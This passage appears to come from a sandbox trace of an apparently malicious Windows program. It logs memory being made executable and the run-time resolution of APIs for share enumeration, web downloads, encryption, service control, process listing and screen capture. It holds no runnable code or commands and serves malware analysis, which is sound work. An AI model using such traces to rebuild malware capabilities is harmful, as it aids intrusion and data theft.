lpProcName="TerminateProcess") returned 0x76d5d802 [0102.693] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0102.693] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0102.694] SetErrorMode (uMode=0x400) returned 0x8001 [0102.694] SetErrorMode (uMode=0x0) returned 0x400 [0102.694] GetVersionExA (in: lpVersionInformation=0x18e770*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e770*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0102.694] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x7b0000 [0102.716] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18f7f8 | out: lpflOldProtect=0x18f7f8*=0x2) returned 1 [0102.910] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76af0000 [0102.910] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeW") returned 0x76b11635 [0102.910] GetProcAddress (hModule=0x76af0000, lpProcName="UuidCreate") returned 0x76b0f48b [0102.910] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringW") returned 0x76b31ee5 [0102.910] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeA") returned 0x76b33fc5 [0102.910] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringA") returned 0x76b6d918 [0102.910] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x75640000 [0102.913] GetProcAddress (hModule=0x75640000, lpProcName="WNetOpenEnumW") returned 0x75642f06 [0102.913] GetProcAddress (hModule=0x75640000, lpProcName="WNetEnumResourceW") returned 0x75643058 [0102.913] GetProcAddress (hModule=0x75640000, lpProcName="WNetCloseEnum") returned 0x75642dd6 [0102.913] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x758d0000 [0102.947] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0102.947] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0102.947] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlW") returned 0x7594be5c [0102.947] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenW") returned 0x758f9197 [0102.947] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoW") returned 0x758f5c75 [0102.947] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0102.947] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlA") returned 0x759130f1 [0102.947] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x75600000 [0102.950] GetProcAddress (hModule=0x75600000, lpProcName="timeGetTime") returned 0x756026e0 [0102.950] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0102.950] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendA") returned 0x772fd65e [0102.950] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0102.950] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0102.950] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0102.950] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0102.950] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0102.950] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0102.950] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0102.951] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0102.951] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0102.951] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0102.951] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0102.951] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0102.951] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0102.951] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0102.951] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0102.951] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0102.951] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0102.951] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0102.951] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynW") returned 0x76d6d556 [0102.952] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0102.952] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0102.952] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0102.952] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0102.952] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0102.952] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0102.952] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0102.952] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0102.952] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0102.952] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0102.952] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0102.952] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSizeEx") returned 0x76d459e2 [0102.952] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0102.953] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0102.953] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0102.953] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0102.953] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0102.953] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0102.953] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0102.953] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0102.953] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0102.953] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0102.953] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0102.953] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0102.953] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0102.953] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0102.954] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0102.954] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0102.954] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0102.954] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0102.954] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0102.954] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0102.954] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0102.954] GetProcAddress (hModule=0x76d30000, lpProcName="SetPriorityClass") returned 0x76d5cf28 [0102.954] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0102.954] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0102.954] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDrives") returned 0x76d45371 [0102.954] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0102.954] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0102.955] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0102.955] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0102.955] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0102.955] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0102.955] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatW") returned 0x76d5f481 [0102.955] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatW") returned 0x76d634d7 [0102.955] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesW") returned 0x76dc425f [0102.955] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0102.955] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0102.955] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0102.955] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0102.955] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0102.955] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0102.956] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0102.956] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0102.956] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0102.956] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0102.956] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0102.956] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0102.956] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0102.956] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0102.956] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0102.956] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatus") returned 0x76d48b6d [0102.956] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0102.956] GetProcAddress (hModule=0x76d30000, lpProcName="FlushConsoleInputBuffer") returned 0x76de7a9f [0102.956] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0102.957] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0102.957] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0102.957] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0102.957] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0102.957] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0102.957] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0102.957] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0102.957] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0102.957] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0102.957] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0102.957] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0102.957] GetProcAddress (hModule=0x76d30000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76de793f [0102.957] GetProcAddress (hModule=0x76d30000, lpProcName="PeekConsoleInputA") returned 0x76de6f0d [0102.958] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0102.958] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0102.958] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0102.958] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0102.958] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0102.958] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0102.958] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0102.958] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0102.958] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0102.958] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0102.958] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0102.958] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0102.959] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0102.959] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleCtrlHandler") returned 0x76d48a09 [0102.959] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0102.959] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0102.959] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0102.959] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0102.959] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0102.959] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0102.959] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0102.959] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0102.959] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0102.959] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0102.959] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0102.960] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0102.960] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0102.960] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0102.960] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0102.960] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0102.960] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0102.960] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0102.960] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0102.960] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0102.960] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0102.960] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0102.960] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0102.960] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0102.961] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0102.961] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0102.961] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0102.961] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0102.961] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0102.961] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0102.961] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0102.961] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0102.961] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0102.961] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0102.961] GetProcAddress (hModule=0x77130000, lpProcName="PeekMessageW") returned 0x771505ba [0102.961] GetProcAddress (hModule=0x77130000, lpProcName="PostThreadMessageW") returned 0x77148bff [0102.961] GetProcAddress (hModule=0x77130000, lpProcName="DefWindowProcW") returned 0x77c725dd [0102.962] GetProcAddress (hModule=0x77130000, lpProcName="DispatchMessageW") returned 0x7714787b [0102.962] GetProcAddress (hModule=0x77130000, lpProcName="UpdateWindow") returned 0x77153559 [0102.962] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExW") returned 0x77148a29 [0102.962] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0102.962] GetProcAddress (hModule=0x77130000, lpProcName="IsWindow") returned 0x77147136 [0102.962] GetProcAddress (hModule=0x77130000, lpProcName="ShowWindow") returned 0x77150dfb [0102.962] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassExW") returned 0x7714b17d [0102.962] GetProcAddress (hModule=0x77130000, lpProcName="PostQuitMessage") returned 0x77149abb [0102.962] GetProcAddress (hModule=0x77130000, lpProcName="GetMessageW") returned 0x771478e2 [0102.962] GetProcAddress (hModule=0x77130000, lpProcName="DestroyWindow") returned 0x77149a55 [0102.962] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0102.962] GetProcAddress (hModule=0x77130000, lpProcName="GetProcessWindowStation") returned 0x77149eea [0102.962] GetProcAddress (hModule=0x77130000, lpProcName="GetUserObjectInformationW") returned 0x77148068 [0102.963] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0102.963] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0102.963] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxW") returned 0x7719fd3f [0102.963] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMessage") returned 0x77147809 [0102.963] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0102.963] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0102.963] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0102.963] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0102.963] GetProcAddress (hModule=0x77710000, lpProcName="ReportEventA") returned 0x77713ee9 [0102.963] GetProcAddress (hModule=0x77710000, lpProcName="RegisterEventSourceA") returned 0x77722d46 [0102.963] GetProcAddress (hModule=0x77710000, lpProcName="DeregisterEventSource") returned 0x777235dd [0102.963] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0102.963] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0102.964] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0102.964] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0102.964] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0102.964] GetProcAddress (hModule=0x77710000, lpProcName="CryptCreateHash") returned 0x7771df4e [0102.964] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0102.964] GetProcAddress (hModule=0x77710000, lpProcName="CryptImportKey") returned 0x7771c532 [0102.964] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatus") returned 0x77722a86 [0102.964] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0102.964] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0102.964] GetProcAddress (hModule=0x77710000, lpProcName="OpenServiceW") returned 0x7771ca4c [0102.964] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0102.964] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0102.964] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetHashParam") returned 0x7771df7e [0102.965] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0102.968] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetPathFromIDListW") returned 0x75a617bf [0102.968] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetSpecialFolderLocation") returned 0x75a5e141 [0102.968] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0102.968] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0102.968] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0102.968] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0102.968] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0102.969] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0102.969] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0102.969] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0102.969] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0102.969] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0102.969] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0102.969] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0102.969] GetProcAddress (hModule=0x76e40000, lpProcName=0x9) returned 0x76e43eae [0102.969] GetProcAddress (hModule=0x76e40000, lpProcName=0xc8) returned 0x76e43f21 [0102.969] GetProcAddress (hModule=0x76e40000, lpProcName=0xca) returned 0x76e4fd6b [0102.969] GetProcAddress (hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0102.969] GetProcAddress (hModule=0x76e40000, lpProcName=0xc) returned 0x76e45dee [0102.970] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0102.970] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x75660000 [0102.985] GetProcAddress (hModule=0x75660000, lpProcName="GetAdaptersInfo") returned 0x75669263 [0102.985] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x77230000 [0102.988] GetProcAddress (hModule=0x77230000, lpProcName=0xc) returned 0x7723b131 [0102.989] GetProcAddress (hModule=0x77230000, lpProcName=0xb) returned 0x7723311b [0102.989] GetProcAddress (hModule=0x77230000, lpProcName=0x34) returned 0x77247673 [0102.989] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x75590000 [0102.993] GetProcAddress (hModule=0x75590000, lpProcName="DnsFree") returned 0x7559436b [0102.993] GetProcAddress (hModule=0x75590000, lpProcName="DnsQuery_W") returned 0x755a572c [0102.993] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77550000 [0102.993] GetProcAddress (hModule=0x77550000, lpProcName="CryptStringToBinaryA") returned 0x77585d77 [0102.994] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0102.994] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0102.994] GetProcAddress (hModule=0x770a0000, lpProcName="GetObjectA") returned 0x770b85d4 [0102.994] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0102.994] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0102.995] GetProcAddress (hModule=0x770a0000, lpProcName="GetBitmapBits") returned 0x770bc155 [0102.995] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0102.995] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0102.995] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0102.995] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0102.995] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0102.995] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0103.002] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0103.003] atexit (param_1=0x540920) returned 0 [0103.031] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f808 | out: lpSystemTimeAsFileTime=0x18f808*(dwLowDateTime=0x3e8805a0, dwHighDateTime=0x1d60a66)) [0103.031] GetCurrentThreadId () returned 0xb54 [0103.031] GetCurrentProcessId () returned 0xbbc [0103.031] QueryPerformanceCounter (in: lpPerformanceCount=0x18f800 | out: lpPerformanceCount=0x18f800*=22337946625) returned 1 [0103.098] GetStartupInfoW (in: lpStartupInfo=0x18f798 | out: lpStartupInfo=0x18f798*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76d43519, hStdOutput=0x77c5fd35, hStdError=0x77cc7daf)) [0103.124] GetProcessHeap () returned 0x6b0000 [0103.238] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0103.238] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0103.238] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0103.239] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0103.239] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0103.239] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0103.239] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0103.239] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0103.239] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0103.239] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0103.239] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0103.239] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0103.239] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0103.240] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0103.240] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0103.240] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0103.240] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0103.240] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0103.240] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0103.240] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0103.240] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0103.240] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0103.240] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0103.240] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0103.241] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0103.241] 